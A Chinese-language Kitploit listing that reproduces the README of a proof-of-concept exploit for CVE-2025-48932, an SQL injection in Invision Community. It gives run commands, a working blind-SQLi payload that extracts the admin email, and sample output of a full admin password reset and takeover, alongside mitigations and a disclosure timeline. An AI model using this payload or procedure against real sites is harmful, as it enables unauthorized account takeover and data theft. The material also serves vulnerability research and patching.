Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-48932---exploit — CVE-2025-48932 的概念验证漏洞利用程序,针对 Invision Community <= 4.7.20 中的 SQL 注入漏洞。通过盲注 SQLi 提取管理员凭据并重置密码。仅限授权测试使用。 | Kitploit
工具/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

CVE-2025-48932 的概念验证漏洞利用程序,针对 Invision Community <= 4.7.20 中的 SQL 注入漏洞。通过盲注 SQLi 提取管理员凭据并重置密码。仅限授权测试使用。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
210个月前尚未审核
分享

Invision Community SQL 注入漏洞利用程序(CVE-2025-48932)

Python Version License CVE

一个概念验证漏洞利用程序,用于演示 Invision Community 版本 <= 4.7.20 中的 SQL 注入漏洞。

⚠️ 免责声明

本工具仅供教育和授权的安全测试使用。

  • 未经授权访问计算机系统是非法的
  • 仅可对你拥有或已获得明确书面许可的系统使用本工具
  • 作者对因使用本工具造成的任何滥用或损害概不负责
  • 本工具仅适用于安全研究人员、渗透测试人员及教育用途

📋 目录

  • 漏洞描述
  • 环境要求
  • 安装
  • 使用方法
  • 工作原理
  • 缓解措施
  • 致谢
  • 参考资料

🔍 漏洞描述

CVE ID: CVE-2025-48932
危害等级: 高危
CVSS 评分: 暂定
受影响版本: 4.7.21 之前的 Invision Community 4.x 版本

该漏洞存在于 /applications/calendar/modules/front/calendar/view.php 脚本中。在 IPS\calendar\modules\front\calendar\view::search() 方法中,通过 location 请求参数传入的用户输入在用于 SQL 查询前未经正确清理。

这允许远程、未认证的攻击者:

  • 从数据库中提取敏感数据
  • 读取管理员凭据
  • 可能实现管理员账户接管

漏洞利用前提条件:

  • 必须安装日历(Calendar)应用程序
  • 必须配置地理位置(GeoLocation)功能(如 Google Maps)

注意: 虽然 Invision Community 4.x 版本(< 4.7.18)中的 SQL 注入漏洞可能通过重置管理员密码导致管理员账户接管和远程代码执行(RCE),但 4.7.18 版本在密码重置机制中引入了新的安全加密密钥,使该攻击途径变得更为困难。

📦 环境要求

  • Python 3.7 或更高版本
  • pip(Python 包管理器)
  • 互联网连接
  • 运行 Invision Community <= 4.7.20 的目标系统,需满足:
    • 已安装日历(Calendar)应用程序
    • 已配置地理位置(GeoLocation)功能

🚀 安装

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/yourusername/invision-sqli-exploit.git
    cd invision-sqli-exploit
    
  2. 安装依赖:

    root@kitploit:~
    pip install -r requirements.txt
    

💻 使用方法

基本用法

root@kitploit:~
python invision-sqli-exploit.py -u http://target.com/forum/

详细模式(用于调试)

root@kitploit:~
python invision-sqli-exploit.py -u https://example.com/community/ -v

命令行参数

示例输出

root@kitploit:~
==================================================
Invision Community <= 4.7.20 SQL Injection Exploit
CVE-2025-48932
==================================================
Target: http://example.com/forum/
==================================================

[*] Fetching CSRF token...
[+] CSRF token found: abc123def456...
[*] Step 1: Extracting admin email address...
[*] Extracting data: [email protected]
[+] Admin email: [email protected]

[!] Step 2: Manual action required!

Please follow these steps:
1. Navigate to: http://example.com/forum/index.php?/lostpassword/
2. Request a password reset using email: [email protected]
3. Press ENTER when done...

[*] Step 3: Extracting password reset validation key...
[*] Extracting data: xyz789abc123...
[+] Reset key: xyz789abc123...
[*] Step 4: Resetting admin password...

==================================================
[+] EXPLOITATION SUCCESSFUL!
==================================================

Admin credentials:
  Email:    [email protected]
  Password: Pwned1721234567

You can now login at: http://example.com/forum/index.php?/login/

🔬 工作原理

该漏洞利用程序通过四个主要步骤执行:

1. CSRF 令牌提取

脚本首先从目标网站获取 CSRF 令牌,后续请求需要用到该令牌。

2. 基于布尔的盲 SQL 注入

利用二分查找算法,漏洞利用程序逐字符从数据库中提取数据:

  • 使用条件 SQL 查询测试每个字符
  • 使用 RLIKE 函数配合正则表达式检测真/假条件
  • 错误信息用于指示条件是否成立

3. 管理员邮箱提取

查询 core_members 表以提取管理员的电子邮件地址。

4. 密码重置利用

  • 攻击者手动为管理员账户发起密码重置
  • 漏洞利用程序从数据库中提取密码重置验证密钥
  • 使用验证密钥在无需访问邮箱的情况下重置管理员密码

技术细节

注入点:

root@kitploit:~
location parameter → calendar/view.php → search() method

载荷示例:

root@kitploit:~
'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#

利用技术: 使用二分查找的高效数据提取方式的基于布尔的盲 SQL 注入。

🛡️ 缓解措施

针对用户

立即行动:

  1. 升级到 4.7.21 或更高版本 - 该版本已修补此漏洞
  2. 如果未使用,请禁用日历(Calendar)应用程序
  3. 监控访问日志 中是否存在可疑活动
  4. 检查管理员账户 是否有未授权访问

针对开发者

安全编码实践:

  1. 使用参数化查询/预编译语句 - 切勿将用户输入直接拼接到 SQL 查询中
  2. 输入验证 - 验证并清理所有用户输入
  3. 最小权限原则 - 数据库用户应仅拥有所需的最小权限
  4. Web 应用防火墙(WAF) - 部署 WAF 规则以检测 SQL 注入尝试
  5. 定期安全审计 - 定期进行代码审查和渗透测试

安全代码示例:

root@kitploit:~
// Vulnerable code
$location = $_REQUEST['location'];
$query = "SELECT * FROM events WHERE location = '$location'";

// Secure code
$location = $_REQUEST['location'];
$query = $db->prepare("SELECT * FROM events WHERE location = ?");
$query->execute([$location]);

📅 披露时间线

日期事件
2025年5月16日通知供应商
2025年5月27日发布 4.7.21 版本
2025年5月28日申请 CVE 标识符
2025年5月28日分配 CVE-2025-48932

👏 致谢

开发者:

  • nanda

注意: 这是基于公开披露的漏洞信息(CVE-2025-48932)的独立实现。

📚 参考资料

  • CVE-2025-48932 详情
  • Invision Community 官方网站
  • EDB-ID: 52383

📝 许可证

本项目基于 MIT 许可证授权 - 详见 LICENSE 文件。

🤝 贡献

欢迎贡献!请随时提交 Pull Request。对于重大更改,请先打开 issue 讨论您想要修改的内容。

⚖️ 法律声明

本工具依据 MIT 许可证分发。使用本软件即表示您同意:

  1. 仅用于合法且经授权的测试目的
  2. 对自己的行为承担全部责任
  3. 不要求作者对任何滥用或损害承担责任
  4. 遵守所有适用法律法规

请记住: 在大多数司法管辖区,未经授权访问计算机系统均属犯罪行为,并可能导致严重的法律后果。


如果您发现安全漏洞,请在公开披露前负责任地向供应商报告。

下载工具
参数说明是否必需
-u, --url目标 Invision Community 基础 URL是
-v, --verbose启用详细输出以便调试否
-h, --help显示帮助信息并退出否
2025年7月23日
公开披露